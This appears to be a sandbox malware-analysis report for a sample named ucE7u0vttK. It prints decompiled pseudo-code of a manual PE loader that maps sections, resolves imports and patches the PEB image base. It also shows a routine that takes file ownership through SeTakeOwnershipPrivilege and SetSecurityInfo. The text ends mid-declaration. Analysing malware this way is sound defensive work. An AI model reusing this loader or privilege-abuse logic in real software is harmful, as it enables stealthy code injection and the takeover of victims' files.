							_t483 = E00401127(_v24 + _v68, _v64, _t552, _t555, _t556);
							_t562 = _t560 + 0xc;
							_v60 = _t483;
							if(_v60 != 0) {
								_push(_v56);
								_push(0);
								_push(_v60);
								_push(0x17);
								E00401127(_t483, _t547, _t552, _t555, _t556);
								_t560 = _t562 + 0xc;
								if( *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10)) > 0) {
									_push( *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10)));
									_t552 = _a4 +  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x14));
									_push(_t552);
									_push(_v60);
									_push(0x18);
									E00401127(_v76 * 0x28, _v64, _t552, _t555, _t556);
									_t560 = _t560 + 0xc;
								}
								_v76 = _v76 + 1;
								continue;
							} else {
								L82:
								return _v40;
							}
						}
						_t506 = _v24 -  *((intOrPtr*)(_v72 + 0x34));
						_v16 = _t506;
						if(_t506 == 0) {
							L29:
							_push( *((intOrPtr*)(_v72 + 0x80)));
							_push(_a4);
							_t344 = E00401127(_v72, _t506, _t552, _t555, _t556);
							_t508 = 0xc;
							_v32 = _t344;
							if(_v32 == _a4) {
								L49:
								_v124 = _v124 & 0x00000000;
								while(1) {
									_t346 = _v72;
									_t347 =  *(_t346 + 6) & 0x0000ffff;
									if(_v124 >= ( *(_t346 + 6) & 0x0000ffff)) {
										break;
									}
									if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x20000000) == 0) {
										if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x40000000) == 0) {
											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
												_v128 = 1;
											} else {
												_v128 = 8;
											}
										} else {
											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
												_v128 = 2;
											} else {
												_v128 = 4;
											}
										}
									} else {
										if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x40000000) == 0) {
											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
												_v128 = 0x10;
											} else {
												_v128 = 0x80;
											}
										} else {
											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
												_v128 = 0x20;
											} else {
												_v128 = 0x40;
											}
										}
									}
									_push(_v128);
									_push( *((intOrPtr*)(_v124 * 0x28 + _v64 + 8)));
									_t376 = _v124 * 0x28;
									_t508 = _v64;
									_t552 = _v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc));
									_push(_v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc)));
									_push(0x10);
									_t377 = E00401127(_t376, _t508, _v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc)), _t555, _t556);
									_t560 = _t560 + 0xc;
									if(_t377 != 0) {
										_v124 = _v124 + 1;
										continue;
									} else {
										goto L82;
									}
								}
								_v8 = 0x18;
								while(1) {
									_push(_v52);
									_push(_v8);
									_t347 = E00401127(_t347, _t508, _t552, _t555, _t556);
									_t508 = 0x15;
									_v52 = _t347;
									if(_v52 == 0) {
										break;
									}
									if( *0x439a9d != 0) {
										_t347 = NtQueryInformationProcess(_v12, 0, _v52, _v8, 0); // executed
										_v44 = _t347;
									}
									if(_v44 == 0xc0000004) {
										continue;
									} else {
										if(_v44 >= 0) {
											 *((intOrPtr*)( *((intOrPtr*)(_v52 + 4)) + 8)) = _v24;
											_v48 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v52 + 4)) + 0xc)) + 0xc));
											 *((intOrPtr*)(_v48 + 0x18)) = _v24;
											_v28 = _v24 +  *((intOrPtr*)(_v72 + 0x28));
											 *_v20 = 0x5a4d;
											E00401127(_v72, _v20, _t552, _t555, _t556);
											_v28(0x10, _v20,  *((intOrPtr*)(_v72 + 0x54)), 2);
											_v40 = 1;
										}
										goto L82;
									}
								}
								goto L82;
							}
							while( *_v32 != 0 ||  *((intOrPtr*)(_v32 + 0x10)) != 0 ||  *((intOrPtr*)(_v32 + 8)) != 0 ||  *((intOrPtr*)(_v32 + 0xc)) != 0 ||  *_v32 != 0 ||  *((intOrPtr*)(_v32 + 4)) != 0) {
								_v104 = _v104 & 0x00000000;
								_v116 = _v116 & 0x00000000;
								_v120 = _v120 & 0x00000000;
								_v112 = _v112 & 0x00000000;
								_v108 = _v108 & 0x00000000;
								if( *((intOrPtr*)(_v32 + 0xc)) != 0) {
									_push( *((intOrPtr*)(_v32 + 0xc)));
									_push(_a4);
									_t399 = E00401127(_v32, _t508, _t552, _t555, _t556);
									_t524 = 0xc;
									_t400 = LoadLibraryA(_t399); // executed
									_v104 = _t400;
									if(_v104 != 0) {
										_push( *_v32);
										_push(_a4);
										_push(0xc);
										_v116 = E00401127(_v32, _t524, _t552, _t555, _t556);
										_t508 = _v24 +  *((intOrPtr*)(_v32 + 0x10));
										_v120 = _v24 +  *((intOrPtr*)(_v32 + 0x10));
										while( *_v116 != 0) {
											if(( *_v116 & 0x80000000) == 0) {
												_push( *_v116);
												_push(_a4);
												_push(0xc);
												_v112 = E00401127(_v116, _t508, _t552, _t555, _t556);
												_v108 = GetProcAddress(_v104, _v112 + 2);
											} else {
												_v108 = GetProcAddress(_v104,  *_v116 & 0x0000ffff);
											}
											if(_v108 != 0) {
												_t508 = _v108;
												 *_v120 = _v108;
												_v116 = _v116 + 4;
												_v120 = _v120 + 4;
												continue;
											} else {
												goto L82;
											}
										}
										_v32 = _v32 + 0x14;
										continue;
									}
									goto L82;
								}
							}
							goto L49;
						}
						_push( *((intOrPtr*)(_v72 + 0xa0)));
						_push(_a4);
						_t431 = E00401127(_v72, _t506, _t552, _t555, _t556);
						_t506 = 0xc;
						_v36 = _t431;
						if(_v36 == _a4) {
							goto L29;
						}
						while( *_v36 != 0) {
							_v100 =  *((intOrPtr*)(_v36 + 4)) - 8 >> 1;
							_v92 = _v92 & 0x00000000;
							_v88 = _v88 & 0x00000000;
							_v84 = _v84 & 0x00000000;
							_v80 = _v80 & 0x00000000;
							_v96 = _v36 + 8;
							while(1) {
								_v100 = _v100 - 1;
								if(_v100 <= 0) {
									break;
								}
								if(( *_v96 & 0x0000ffff) >> 0xc != 3) {
									if(( *_v96 & 0x0000ffff) >> 0xc == 0xa) {
										_v92 = ( *_v96 & 0xfff) +  *_v36;
										_push(_v92);
										_push(_a4);
										_push(0xc);
										_t455 = E00401127(( *_v96 & 0xfff) +  *_v36, _v36, _t552, _t555, _t556);
										asm("cdq");
										_v84 =  *_t455 & 0x000000ff;
										_v80 = _t552;
										asm("adc ecx, [ebp-0x4c]");
										_v84 = _v16 + _v84;
										_v80 = 0;
										_t460 = _v24 + _v92;
										 *_t460 = _v84;
										_t460[1] = _v80;
									}
								} else {
									_v92 = ( *_v96 & 0xfff) +  *_v36;
									_push(_v92);
									_push(_a4);
									_push(0xc);
									_v88 =  *((intOrPtr*)(E00401127(( *_v96 & 0xfff) +  *_v36, _v36, _t552, _t555, _t556)));
									_v88 = _v88 + _v16;
									 *(_v24 + _v92) = _v88;
								}
								_v96 =  &(_v96[1]);
							}
							_t441 = _v36;
							_t506 = _v36 +  *((intOrPtr*)(_t441 + 4));
							_v36 = _v36 +  *((intOrPtr*)(_t441 + 4));
						}
						goto L29;
					}
					goto L82;
				}
				if(( *(_v72 + 0x16) & 1) == 0) {
					_push(0x40);
					_push(0);
					_push( *((intOrPtr*)(_v72 + 0x50)));
					_push(0x1a);
					_t501 = E00401127(_v72, _t503, __edx, _t555, _t556);
					_t558 = _t558 + 0xc;
					_v24 = _t501;
					if(_v24 != 0) {
						goto L5;
					} else {
						goto L82;
					}
				} else {
					goto L82;
				}
			}



























































    0x00437b9e
    0x00437ba8
    0x00437bac
    0x00437bb0
    0x00437bb4
    0x00437bb8
    0x00437bbc
    0x00437bc0
    0x00437bc4
    0x00437bc8
    0x00437bcc
    0x00437bd0
    0x00437bd4
    0x00437bd8
    0x00437bdc
    0x00437be0
    0x00437be4
    0x00437be8
    0x00437bee
    0x00437bf1
    0x00437bf4
    0x00437bf9
    0x00437bff
    0x00437c02
    0x00437c04
    0x00437c09
    0x00437c0c
    0x00437c13
    0x00437c54
    0x00437c5a
    0x00437c5d
    0x00437c5f
    0x00437c65
    0x00437c68
    0x00437c6a
    0x00437c6f
    0x00437c72
    0x00437c79
    0x00437c88
    0x00437c8b
    0x00437c8e
    0x00437c91
    0x00437c93
    0x00437c98
    0x00437ca9
    0x00437cac
    0x00437cb9
    0x00437cd5
    0x00437cd8
    0x00437ce3
    0x00437d04
    0x00437ce5
    0x00437cf2
    0x00437cf2
    0x00437d0a
    0x00437d13
    0x00437d1a
    0x00437d1d
    0x00437d25
    0x00437d26
    0x00437d29
    0x00437d2b
    0x00437d30
    0x00437d33
    0x00437d3a
    0x00437d46
    0x00437d49
    0x00437d4b
    0x00437d4e
    0x00437d50
    0x00437d55
    0x00437d66
    0x00437d71
    0x00437d81
    0x00437d85
    0x00437d86
    0x00437d89
    0x00437d8b
    0x00437d90
    0x00437d90
    0x00437cb6
    0x00000000
    0x00437d3c
    0x0043820e
    0x00438213
    0x00438213
    0x00437d3a
    0x00437d9e
    0x00437da1
    0x00437da4
    0x00437ed8
    0x00437edb
    0x00437ee1
    0x00437ee6
    0x00437eec
    0x00437eed
    0x00437ef6
    0x0043802c
    0x0043802c
    0x00438039
    0x00438039
    0x0043803c
    0x00438043
    0x00000000
    0x00000000
    0x0043805b
    0x004380cf
    0x00438109
    0x00438114
    0x0043810b
    0x0043810b
    0x0043810b
    0x004380d1
    0x004380e3
    0x004380ee
    0x004380e5
    0x004380e5
    0x004380e5
    0x004380f5
    0x0043805d
    0x0043806f
    0x004380a9
    0x004380b4
    0x004380ab
    0x004380ab
    0x004380ab
    0x00438071
    0x00438083
    0x0043808e
    0x00438085
    0x00438085
    0x00438085
    0x00438095
    0x004380bb
    0x0043811b
    0x00438127
    0x0043812e
    0x00438131
    0x00438137
    0x0043813b
    0x0043813c
    0x0043813e
    0x00438143
    0x00438148
    0x00438036
    0x00000000
    0x0043814a
    0x00000000
    0x0043814a
    0x00438148
    0x00438159
    0x00438160
    0x00438160
    0x00438163
    0x00438168
    0x0043816e
    0x0043816f
    0x00438176
    0x00000000
    0x00000000
    0x00438189
    0x00438198
    0x0043819e
    0x0043819e
    0x004381a8
    0x00000000
    0x004381aa
    0x004381ae
    0x004381bd
    0x004381cc
    0x004381d5
    0x004381e1
    0x004381ec
    0x004381fc
    0x00438204
    0x00438207
    0x00438207
    0x00000000
    0x004381ae
    0x004381a8
    0x00000000
    0x00438178
    0x00437efc
    0x00437f34
    0x00437f38
    0x00437f3c
    0x00437f40
    0x00437f44
    0x00437f4f
    0x00437f56
    0x00437f59
    0x00437f5e
    0x00437f64
    0x00437f66
    0x00437f6c
    0x00437f73
    0x00437f82
    0x00437f84
    0x00437f87
    0x00437f90
    0x00437f99
    0x00437f9c
    0x00437f9f
    0x00437fb1
    0x00437fcf
    0x00437fd1
    0x00437fd4
    0x00437fdd
    0x00437fef
    0x00437fb3
    0x00437fc7
    0x00437fc7
    0x00437ff6
    0x00438005
    0x00438008
    0x00438010
    0x00438019
    0x00000000
    0x00437ff8
    0x00000000
    0x00437ff8
    0x00437ff6
    0x00438024
    0x00000000
    0x00438024
    0x00000000
    0x00437f75
    0x00437f51
    0x00000000
    0x00437efc
    0x00437dad
    0x00437db3
    0x00437db8
    0x00437dbe
    0x00437dbf
    0x00437dc8
    0x00000000
    0x00000000
    0x00437dce
    0x00437de5
    0x00437de8
    0x00437dec
    0x00437df0
    0x00437df4
    0x00437dfe
    0x00437e01
    0x00437e08
    0x00437e0d
    0x00000000
    0x00000000
    0x00437e1f
    0x00437e6a
    0x00437e7c
    0x00437e7f
    0x00437e82
    0x00437e85
    0x00437e87
    0x00437e91
    0x00437e92
    0x00437e95
    0x00437ea0
    0x00437ea3
    0x00437ea6
    0x00437eac
    0x00437eb2
    0x00437eb7
    0x00437eb7
    0x00437e21
    0x00437e31
    0x00437e34
    0x00437e37
    0x00437e3a
    0x00437e45
    0x00437e4e
    0x00437e5a
    0x00437e5a
    0x00437ebf
    0x00437ebf
    0x00437ec7
    0x00437ecd
    0x00437ed0
    0x00437ed0
    0x00000000
    0x00437dce
    0x00000000
    0x00437c7b
    0x00437c1f
    0x00437c2d
    0x00437c2f
    0x00437c34
    0x00437c37
    0x00437c39
    0x00437c3e
    0x00437c41
    0x00437c48
    0x00000000
    0x00437c4a
    0x00000000
    0x00437c4a
    0x00437c21
    0x00000000
    0x00437c21

    APIs
    • GetCurrentProcess.KERNEL32(?,00000040), ref: 00437C54
    • LoadLibraryA.KERNEL32(00000000), ref: 00437F66
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00437FC1
    • GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 00437FE9
    • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 00438198
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939837512.00437000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12939683280.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12939691555.00401000.00000040.sdmp
    • Associated: 00000002.00000002.12939699131.00402000.00000080.sdmp
    • Associated: 00000002.00000002.12939738500.0041D000.00000040.sdmp
    • Associated: 00000002.00000002.12939827664.00436000.00000080.sdmp
    • Associated: 00000002.00000002.12939850458.0043A000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ucE7u0vttK.jbxd
    Function 003C80A0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 199

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 563 3c80a0-3c80eb 565 3c824f-3c825a 563->565 566 3c80f1-3c811b 563->566 570 3c825c-3c8261 565->570 566->565 569 3c8121-3c8182 memset 566->569 578 3c8188-3c81ab SetSecurityInfo 569->578 579 3c824a-3c824d 569->579 571 3c8272-3c8277 570->571 572 3c8263-3c826f 570->572 574 3c8279-3c827f 571->574 575 3c8287-3c828c 571->575 572->571 574->575 576 3c829d-3c82a2 575->576 577 3c828e-3c8295 575->577 580 3c82a4-3c82b0 576->580 581 3c82b3-3c82bb 576->581 577->576 578->579 582 3c81b1-3c81b4 578->582 579->565 579->570 580->581 582->579 583 3c81ba-3c81da 582->583 583->565 586 3c81dc-3c81f2 call 3e1ff0 583->586 586->565 589 3c81f4-3c8214 SetSecurityInfo 586->589 589->579 590 3c8216-3c822b call 3e1ff0 589->590 590->565 593 3c822d-3c8248 SetSecurityInfo 590->593 593->579
    C-Code - Quality: 63%
    			E003C80A0(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				short _v24;
				char _v28;
				short _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				int _v80;
				int _v92;
				intOrPtr _v96;
				void _v100;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t82;
				intOrPtr _t83;
				void* _t88;
				void* _t90;
				void* _t93;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t122;
				intOrPtr _t127;
				void* _t128;

				_t113 =  *0x3e8628; // 0x622508
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_v28 = 0;
				_v24 = 0x100;
				_v36 = 0;
				_v32 = 0x500;
				_push( &_v28);
				if( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x158))))() == 0) {
					L11:
					_t114 =  *0x3e8628; // 0x622508
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x30))))();
				} else {
					_t74 =  *0x3e8628; // 0x622508
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v36);
					if( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x158))))() == 0) {
						goto L11;
					} else {
						memset( &_v100, 0, 0x40);
						_v72 = _v20;
						_v40 = _v8;
						_t104 =  *0x3e8628; // 0x622508
						_v100 = 0x80000000;
						_v96 = 2;
						_v92 = 0;
						_v80 = 0;
						_v76 = 5;
						_v68 = 0x10000000;
						_v64 = 2;
						_v60 = 0;
						_v48 = 0;
						_v44 = 2;
						_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x1b0))))(2,  &_v100, 0,  &_v12);
						if(_t128 != 0) {
							L10:
							if(_t128 == 0xffffffff) {
								goto L11;
							}
						} else {
							_t127 = _a8;
							_t122 =  *0x3e8628; // 0x622508
							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
							_t128 = _t82;
							if(_t128 == 0 || _t128 != 5) {
								goto L10;
							} else {
								_t83 =  *0x3e8628; // 0x622508
								_t39 = _t83 + 0x150; // 0x622658
								_push( *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x100))))(0x20,  &_v16));
								if( *((intOrPtr*)( *_t39))() == 0) {
									goto L11;
								} else {
									_t88 = E003E1FF0(1, L"SeTakeOwnershipPrivilege", _v16); // executed
									if(_t88 == 0) {
										goto L11;
									} else {
										_t109 =  *0x3e8628; // 0x622508
										_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x1a8))))(_a4, _t127, 1, _v8, 0, 0, 0); // executed
										_t128 = _t90;
										if(_t128 != 0) {
											goto L10;
										} else {
											_t93 = E003E1FF0(0, L"SeTakeOwnershipPrivilege", _v16); // executed
											if(_t93 == 0) {
												goto L11;
											} else {
												_t94 =  *0x3e8628; // 0x622508
												_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
												_t128 = _t95;
												goto L10;
											}
										}
									}
								}
							}
						}
					}
				}
				_t63 = _v8;
				if(_t63 != 0) {
					_t100 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x154))))(_t63);
				}
				_t64 = _v20;
				if(_t64 != 0) {
					_t71 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x154))))(_t64);
				}
				_t65 = _v12;
				if(_t65 != 0) {
					_t116 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x9c))))(_t65);
				}
				_t66 = _v16;
				if(_t66 != 0) {
					_t98 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xf8))))(_t66);
				}
				return _t128;
			}














































    0x003c80a8
    0x003c80b4
    0x003c80b5
    0x003c80b6
    0x003c80b7
    0x003c80b8
    0x003c80b9
    0x003c80ba
    0x003c80bb
    0x003c80bc
    0x003c80bd
    0x003c80c2
    0x003c80c5
    0x003c80c8
    0x003c80cb
    0x003c80ce
    0x003c80d1
    0x003c80d7
    0x003c80da
    0x003c80e6
    0x003c80eb
    0x003c824f
    0x003c824f
    0x003c825a
    0x003c80f1
    0x003c80f1
    0x003c80f9
    0x003c8100
    0x003c8101
    0x003c8102
    0x003c8103
    0x003c8104
    0x003c8105
    0x003c8106
    0x003c810b
    0x003c8112
    0x003c8116
    0x003c811b
    0x00000000
    0x003c8121
    0x003c8128
    0x003c813a
    0x003c813e
    0x003c8141
    0x003c814b
    0x003c8152
    0x003c8155
    0x003c8158
    0x003c815b
    0x003c8162
    0x003c8169
    0x003c816c
    0x003c816f
    0x003c8172
    0x003c817e
    0x003c8182
    0x003c824a
    0x003c824d
    0x00000000
    0x00000000
    0x003c8188
    0x003c818b
    0x003c8191
    0x003c81a5
    0x003c81a7
    0x003c81ab
    0x00000000
    0x003c81ba
    0x003c81ba
    0x003c81cb
    0x003c81d3
    0x003c81da
    0x00000000
    0x003c81dc
    0x003c81e8
    0x003c81f2
    0x00000000
    0x003c81f4
    0x003c81fa
    0x003c820e
    0x003c8210
    0x003c8214
    0x00000000
    0x003c8216
    0x003c8221
    0x003c822b
    0x00000000
    0x003c822d
    0x003c8233
    0x003c8246
    0x003c8248
    0x00000000
    0x003c8248
    0x003c822b
    0x003c8214
    0x003c81f2
    0x003c81da
    0x003c81ab
    0x003c8182
    0x003c811b
    0x003c825c
    0x003c8261
    0x003c8263
    0x003c8270
    0x003c8270
    0x003c8272
    0x003c8277
    0x003c827a
    0x003c8285
    0x003c8285
    0x003c8287
    0x003c828c
    0x003c828e
    0x003c829b
    0x003c829b
    0x003c829d
    0x003c82a2
    0x003c82a4
    0x003c82b1
    0x003c82b1
    0x003c82bb

    APIs
    • memset.MSVCRT ref: 003C8128
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C81A5
      • Part of subcall function 003E1FF0: AdjustTokenPrivileges.KERNELBASE(003C81ED,00000000,?,00000010,00000000,00000000), ref: 003E2052
    • SetSecurityInfo.ADVAPI32(?,?,00000001,?,00000000,00000000,00000000), ref: 003C820E
    • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C8246
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E1FF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
    C-Code - Quality: 76%
    			E003E1FF0(signed int __eax, void* __ecx, void* _a4) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				struct _TOKEN_PRIVILEGES _v28;
				int _t21;
				intOrPtr _t28;
				intOrPtr _t31;

				_t31 =  *0x3e8628; // 0x622508
				_push( &_v12);
				_push(0);
				if( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x188))))() != 0) {
					asm("sbb esi, esi");
					_v28.Privileges = _v12;
					_v20 = _v8;
					_v28.PrivilegeCount = 1;
					_v16 =  ~__eax & 0x00000002;
					_t21 = AdjustTokenPrivileges(_a4, 0,  &_v28, 0x10, 0, 0); // executed
					if(_t21 == 0) {
						goto L1;
					} else {
						_t28 =  *0x3e8628; // 0x622508
						return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x30))))() != 0x00000514;
					}
				} else {
					L1:
					return 0;
				}
			}











    0x003e1ff3
    0x003e2002
    0x003e200a
    0x003e2010
    0x003e202b
    0x003e202d
    0x003e2033
    0x003e2041
    0x003e2048
    0x003e2052
    0x003e2056
    0x00000000
    0x003e2058
    0x003e2058
    0x003e2073
    0x003e2073
    0x003e2012
    0x003e2012
    0x003e2018
    0x003e2018

    APIs
    • AdjustTokenPrivileges.KERNELBASE(003C81ED,00000000,?,00000010,00000000,00000000), ref: 003E2052
    Strings
    • SeTakeOwnershipPrivilege, xrefs: 003E2009
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CE850, Relevance: 1.5, APIs: 1, Instructions: 33com
    C-Code - Quality: 100%
    			E003CE850(intOrPtr* __ecx) {
				void* _t4;
				intOrPtr _t8;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t15 = __ecx;
				_t14 = __ecx + 4;
				 *_t14 = 0;
				 *__ecx = 0;
				_t4 = E003C36C0();
				if(_t4 != 0) {
					_t13 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0x1c4))))(0x3e638c, 0, 1, 0x3e617c, _t14); // executed
					return _t15;
				} else {
					_t8 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c4))))(0x3e614c, _t4, 1, 0x3e612c, _t15);
					return _t15;
				}
			}








    0x003ce851
    0x003ce854
    0x003ce857
    0x003ce85d
    0x003ce863
    0x003ce86a
    0x003ce88c
    0x003ce8a7
    0x003ce8ad
    0x003ce86c
    0x003ce875
    0x003ce885
    0x003ce88b
    0x003ce88b

    APIs
    • CoCreateInstance.OLE32(003E638C,00000000,00000001,003E617C,?), ref: 003CE8A7
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C952C, Relevance: 1.5, APIs: 1, Instructions: 4
    C-Code - Quality: 100%
    			E003C952C() {

				SetUnhandledExceptionFilter(E003CBB6D); // executed
				return 0;
			}



    0x003c9531
    0x003c9539

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_0000BB6D), ref: 003C9531
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C3D50, Relevance: 16.9, APIs: 11, Instructions: 368

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46 3c3d50-3c3d54 47 3c3d5b 46->47 48 3c3d56 46->48 49 3c61e0-3c6276 47->49 48->49 51 3c627c-3c628f 49->51 52 3c65ae-3c65b3 49->52 51->52 58 3c6295-3c62b5 call 3c8030 call 3c32c0 51->58 53 3c65bd-3c65c2 52->53 54 3c65b5-3c65b8 52->54 55 3c65cc-3c65d1 53->55 56 3c65c4-3c65c9 53->56 54->53 59 3c65dc-3c65e5 55->59 60 3c65d3-3c65d9 call 3cbb40 55->60 56->55 67 3c62c7-3c62d7 call 3c5bd0 58->67 68 3c62b7-3c62c2 call 3e0580 58->68 60->59 67->52 73 3c62dd-3c6371 call 3c9090 * 2 VariantInit * 2 call 3e0290 call 3c13c0 67->73 68->52 82 3c637a 73->82 83 3c6373-3c6378 73->83 84 3c6381-3c6394 call 3c13c0 82->84 83->84 87 3c639d 84->87 88 3c6396-3c639b 84->88 89 3c63a4-3c643c call 3c7cf0 * 2 VariantClear * 3 87->89 88->89 95 3c65a2 call 3c6d30 89->95 96 3c6442-3c6448 89->96 100 3c65a7-3c65a9 95->100 96->52 97 3c644e-3c645e call 3c5bd0 96->97 97->52 103 3c6464-3c64df call 3c9090 VariantInit * 3 call 3c13c0 97->103 100->52 102 3c65ab 100->102 102->52 108 3c64e8 103->108 109 3c64e1-3c64e6 103->109 110 3c64ef-3c6502 call 3c13c0 108->110 109->110 113 3c650b 110->113 114 3c6504-3c6509 110->114 115 3c6512-3c65a0 call 3c7cf0 * 2 VariantClear * 3 113->115 114->115 115->52
    C-Code - Quality: 72%
    			E003C3D50(intOrPtr* __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v22;
				char* _v24;
				intOrPtr _v26;
				void* _v28;
				intOrPtr _v30;
				void* _v32;
				intOrPtr _v34;
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				short _v74;
				void* _v76;
				void _v80;
				char* _v84;
				char _v88;
				char* _v92;
				intOrPtr* _v96;
				void* _v100;
				char _v104;
				char* _v108;
				intOrPtr* _v112;
				char* _v116;
				char _v120;
				intOrPtr* _v124;
				char* _v128;
				char* _v132;
				char _v136;
				char _v280;
				char _v336;
				char _v536;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				intOrPtr* __ebp;
				intOrPtr* _t239;
				void* _t241;
				intOrPtr* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t256;
				intOrPtr* _t260;
				intOrPtr* _t261;
				intOrPtr* _t262;
				intOrPtr* _t264;
				intOrPtr* _t268;
				intOrPtr* _t270;
				intOrPtr* _t271;
				intOrPtr* _t272;
				intOrPtr* _t273;
				intOrPtr* _t275;
				intOrPtr* _t276;
				intOrPtr* _t277;
				intOrPtr* _t278;
				intOrPtr* _t280;
				intOrPtr* _t281;
				void* _t283;
				intOrPtr* _t284;
				intOrPtr _t292;
				void* _t329;
				void* _t333;
